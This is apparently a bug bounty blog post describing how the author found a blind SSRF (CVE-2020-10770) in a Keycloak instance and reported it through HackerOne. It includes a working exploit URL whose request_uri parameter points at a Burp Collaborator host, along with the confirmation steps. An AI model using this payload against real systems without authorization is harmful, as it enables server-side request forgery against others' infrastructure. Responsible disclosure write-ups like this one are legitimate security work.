How do I found Blind SSRF on a Hackerone Program

#$ubh@nk@r
2 min readFeb 29, 2024

--

Intro: Hey guys! What’s Up. Today I will tell you how do I find a Blind SSRF on a VDP which is also known as CVE-2020–10770. So let’s jump into it.

This Vulnerability-Exploit is also present in Exploit-DB. This is present in Keycloak 12.0.1.

Recon :

While using subfinder I found a domain called portalcustodiacloak.domain.com. So in this Domain I found SSRF just following Exploit-db. The endpoint is

http://portalcustodiacloak.domain.com
/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=<collaborator_url>

Attack :

So I just Intercept the Request in Burp Repeater and saw the Response.

Saying 400 Bad Request. So now in the URL Section I put the Burp Collaborator Payload.

Then I click Poll Now and I saw HTTP and DNS Interaction in my Burp Collaborator Client. In this way I understand this is Vulnerable to Blind SSRF.

So this way I found this Vulnerability and Report this via Hackerone. That’s it.

THANKS FOR READING!

If you like it don’t forget to Like it and Follow me for more Articles.

Happy Hacking~

--

--

#$ubh@nk@r
#$ubh@nk@r

Written by #$ubh@nk@r

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/

Responses (4)